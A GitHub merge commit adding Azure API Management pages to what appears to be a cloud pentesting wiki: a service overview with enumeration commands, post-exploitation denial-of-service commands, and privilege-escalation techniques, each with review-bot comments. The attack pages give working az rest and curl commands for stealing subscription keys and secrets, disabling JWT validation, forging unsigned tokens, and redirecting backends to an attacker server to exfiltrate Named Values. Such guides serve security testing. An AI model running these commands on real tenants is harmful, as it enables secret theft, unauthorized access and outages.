Merge pull request #236 from JaimePolop/master

api management
This commit is contained in:
SirBroccoli
2025-12-23 17:29:18 +01:00
committed by GitHub
4 changed files with 376 additions and 0 deletions

@@ -460,6 +460,7 @@
- [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
- [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
- [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
- [Az - API Management](pentesting-cloud/azure-security/az-services/az-api-management.md)
- [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
@@ -507,6 +508,7 @@
- [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md)
- [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md)
- [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
- [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md)
- [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
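Review bot: the new sidebar entry `Az API Management Post Exploitation` drops the ` - ` separator that the sibling entries in this hunk use (`Az - Blob Storage Post Exploitation`, `Az - CosmosDB Post Exploitation`); rename it to `Az - API Management Post Exploitation` so the navigation stays consistent. The neighbouring `Az Azure Ai Foundry Post Exploitation` entry has the same inconsistency and could be fixed in passing.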
@@ -525,6 +527,7 @@
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
- [Az - AI Foundry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md)
- [Az - API Management Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md)
- [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
- [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)

@@ -0,0 +1,89 @@
# Azure - API Management Post-Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
The attacker can use multiple vectors to cause a denial of service. To block legitimate traffic, the attacker adds rate-limiting and quota policies with extremely low values, effectively preventing normal access:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
To block specific legitimate client IPs, the attacker can add IP filtering policies that reject requests from selected addresses:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`
To cause requests to fail, the attacker can modify a backend configuration and change its URL to an invalid or unreachable address:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'
```
Or delete backends:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/apis/delete`
To make critical APIs unavailable, the attacker can delete them directly from the API Management service:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
To block access from the Internet, the attacker can disable public network access on the API Management service:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'
```
## `Microsoft.ApiManagement/service/subscriptions/delete`
To block access for legitimate users, the attacker can delete API Management subscriptions:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
{{#include ../../../banners/hacktricks-training.md}}
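Review bot: the heading `## Microsoft.ApiManagement/service/write or Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action` names a second permission that none of the commands under it exercise; the only call shown is a PATCH that sets `publicNetworkAccess` to `Disabled`, which is covered by `service/write` alone. Either drop `applynetworkconfigurationupdates/action` from the heading or add a sentence explaining when that action is needed. Also in this file, the backend PUT and every DELETE pass `"If-Match=*"`, while the two policy PUTs at the top of the file send no `If-Match` header even though they also update an existing entity; either add the header there or state that it is not required for the policy resource, so the commands are consistent.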

@@ -0,0 +1,202 @@
# Az - API Management Privesc
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
The attack consists of accessing sensitive secrets stored in Azure API Management Named Values, either by directly retrieving secret values or by abusing permissions to obtain Key Vaultbacked secrets through managed identities.
```bash
az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
```
## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
For each subscription, the attacker can obtain the subscription keys by using the listSecrets endpoint with the POST method:
```bash
az rest --method POST \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
```
The response includes the subscription primary key (primaryKey) and secondary key (secondaryKey). With these keys, the attacker can authenticate and access the APIs published through the API Management Gateway:
```bash
curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
https://<service-name>.azure-api.net/<api-path>
```
The attacker can access all APIs and products associated with the subscription. If the subscription has access to sensitive products or APIs, the attacker may obtain confidential information or perform unauthorized operations.
## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
The attacker first retrieves the current API policy:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
```
The attacker can modify the policy in multiple ways depending on their objectives. For example, to disable authentication, if the policy includes JWT token validation, the attacker can remove or comment out that section:
```xml
<policies>
<inbound>
<base />
<!-- JWT validation removed by the attacker -->
<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
...
</validate-jwt> -->
</inbound>
<backend>
<base />
</backend>
<outbound>
<base />
</outbound>
<on-error>
<base />
</on-error>
</policies>
```
To remove rate limiting controls and allow denial-of-service attacks, the attacker can remove or comment out quota and rate-limit policies:
```xml
<policies>
<inbound>
<base />
<!-- Rate limiting removed by the attacker -->
<!-- <rate-limit calls="100" renewal-period="60" />
<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
</inbound>
...
</policies>
```
To modify the backend route and redirect traffic to an attacker-controlled server:
```xml
<policies>
...
<inbound>
<base />
<set-backend-service base-url="https://attacker-controlled-server.com" />
</inbound>
...
</policies>
```
The attacker then applies the modified policy. The request body must be a JSON object containing the policy in XML format:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
}
}'
```
## JWT Validation Misconfiguration
The attacker needs to know that an API uses JWT token validation and that the policy is misconfigured. Poorly configured JWT validation policies may have `require-signed-tokens="false"` or `require-expiration-time="false"`, which allows the service to accept unsigned tokens or tokens that never expire.
The attacker creates a malicious JWT token using the none algorithm (unsigned):
```
# Header: {"alg":"none"}
# Payload: {"sub":"user"}
eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
```
The attacker sends a request to the API using the malicious token:
```bash
curl -X GET \
-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
https://<apim>.azure-api.net/path
```
If the policy is misconfigured with `require-signed-tokens="false"`, the service will accept the unsigned token. The attacker can also create a token without an expiration claim if `require-expiration-time="false"`.
## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
The attacker first checks the current network configuration of the service:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
```
The attacker reviews the JSON response to verify the values of `publicNetworkAccess` and `virtualNetworkType`. If `publicNetworkAccess` is set to false or `virtualNetworkType` is set to Internal, the service is configured for private access.
To expose the service to the Internet, the attacker must change both settings. If the service is running in internal mode (`virtualNetworkType: "Internal"`), the attacker changes it to None or External and enables public network access. This can be done using the Azure Management API:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Enabled",
"virtualNetworkType": "None"
}
}'
```
Once `virtualNetworkType` is set to `None` or `External` and `publicNetworkAccess` is enabled, the service and all its APIs become accessible from the Internet, even if they were previously protected behind a private network or private endpoints.
## `Microsoft.ApiManagement/service/backends/write`
The attacker first enumerates the existing backends to identify which one to modify:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
```
The attacker retrieves the current configuration of the backend they want to modify:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
```
The attacker modifies the backend URL to point to a server under their control. First, they obtain the ETag from the previous response and then update the backend:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"description": "Backend modified by attacker"
}
}'
```
Alternatively, the attacker can configure backend headers to exfiltrate Named Values containing secrets. This is done through the backend credentials configuration:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"credentials": {
"header": {
"X-Secret-Value": ["{{named-value-secret}}"]
}
}
}
}'
```
With this configuration, Named Values are sent as headers in all requests to the attacker-controlled backend, enabling the exfiltration of sensitive secrets.
{{#include ../../../banners/hacktricks-training.md}}
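Review bot: the sentence "First, they obtain the ETag from the previous response and then update the backend" contradicts the command that follows, which sends `"If-Match=*"` and never uses the retrieved ETag; either pass the ETag value in `If-Match` or drop the sentence. Further points in this file: in the `applynetworkconfigurationupdates/action` section, `publicNetworkAccess` is compared to `false`, but the property is a string (the PATCH body a few lines later sets it to `"Enabled"`), so the check should read `Disabled`; the final policy PUT body is the bare `<base />` skeleton rather than any of the three modified policies shown above it, so the reader has to assemble the body themselves; and `Key Vaultbacked` in the Named Values section is missing its hyphen (`Key Vault-backed`).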

@@ -0,0 +1,82 @@
# Az - API Management
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
Azure API Management (APIM) is a fully managed service that offers a **unified platform for publishing, securing, transforming, managing, and monitoring APIs**. It enables organizations to **centralize their API** strategy and ensure consistent governance, performance, and security across all their services. By acting as an abstraction layer between backend services and API consumers, APIM simplifies integration and enhances maintainability while providing essential operational and security capabilities.
## Core Concepts
**The API Gateway** serves as the single entry point for all API traffic, handling functions such as routing requests to backend services, enforcing rate limits, caching responses, and managing authentication and authorization. This gateway is fully hosted and managed by Azure, ensuring high availability and scalability.
**The Developer Portal** provides a self-service environment where API consumers can discover available APIs, read documentation, and test endpoints. It helps streamline onboarding by offering interactive tools and access to subscription information.
**The Management Portal (Management Plane)** is used by administrators to configure and maintain the APIM service. From here, users can define APIs and operations, configure access control, apply policies, manage users, and organize APIs into products. This portal centralizes administration and ensures consistent API governance.
## Authentication and Authorization
Azure API Management supports several **authentication mechanisms** to secure API access. These include **subscription keys**, **OAuth 2.0 tokens**, and **client certificates**. APIM also integrates natively with **Microsoft Entra ID**, enabling **enterprise-level identity management** and **secure access** to both APIs and backend services.
## Policies
Policies in APIM allow administrators to customize **request and response processing** at various granularities, including the **service**, **API**, **operation**, or **product** level. Through policies, it is possible to enforce **JWT token validation**, **transform XML or JSON payloads**, **apply rate limiting**, **restrict calls by IP address**, or **authenticate against backend services using managed identities**. Policies are **highly flexible** and form one of the **core strengths** of the API Management platform, enabling **fine-grained control over runtime behavior** without modifying backend code.
## Named Values
The service provides a mechanism called **Named Values**, which allows storing **configuration information** such as **secrets**, **API keys**, or other values required by policies.
These values can be stored directly within APIM or securely referenced from **Azure Key Vault**. Named Values promote **secure and centralized management** of configuration data and simplify policy authoring by allowing **reusable references** instead of hardcoded values.
## Networking and Security Integration
Azure API Management integrates seamlessly with **virtual network environments**, enabling **private and secure connectivity** to backend systems.
When deployed inside a **Virtual Network (VNet)**, APIM can access **internal services** without exposing them publicly. The service also allows the configuration of **custom certificates** to support **mutual TLS authentication** with backend services, improving security in scenarios where **strong identity validation** is required.
These **networking features** make APIM suitable for both **cloud-native** and **hybrid architectures**.
### Enumerate
To enumerate the API management service:
```bash
# Lists all Named Values configured in the Azure API Management instance
az apim nv list --resource-group <resource-group> --service-name <service-name>
# Retrieves all policies applied at the API level in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
# Retrieves the effective policy for a specific API in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"
# Gets the configuration details of the APIM service instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
# Lists all backend services registered in the APIM instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
# Retrieves details of a specific backend service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
# Gets general information about the APIM service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01"
# Calls an exposed API endpoint through the APIM gateway
curl https://<apim>.azure-api.net/<api-path>
```
{{#include ../../../banners/hacktricks-training.md}}
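Review bot: the comment `Retrieves the effective policy for a specific API` above the `.../apis/<api-id>/policies/policy` GET is inaccurate: that endpoint returns only the policy defined at the API scope, not the merged result of the global, product, API and operation scopes, so it should read "Retrieves the API-scope policy". The GET of the service resource is also listed twice in the same block (`.../service/<apim>` under "Gets the configuration details of the APIM service instance" and `.../service/<service-name>` under "Gets general information about the APIM service"); keep one of them and use a single placeholder name for the service throughout.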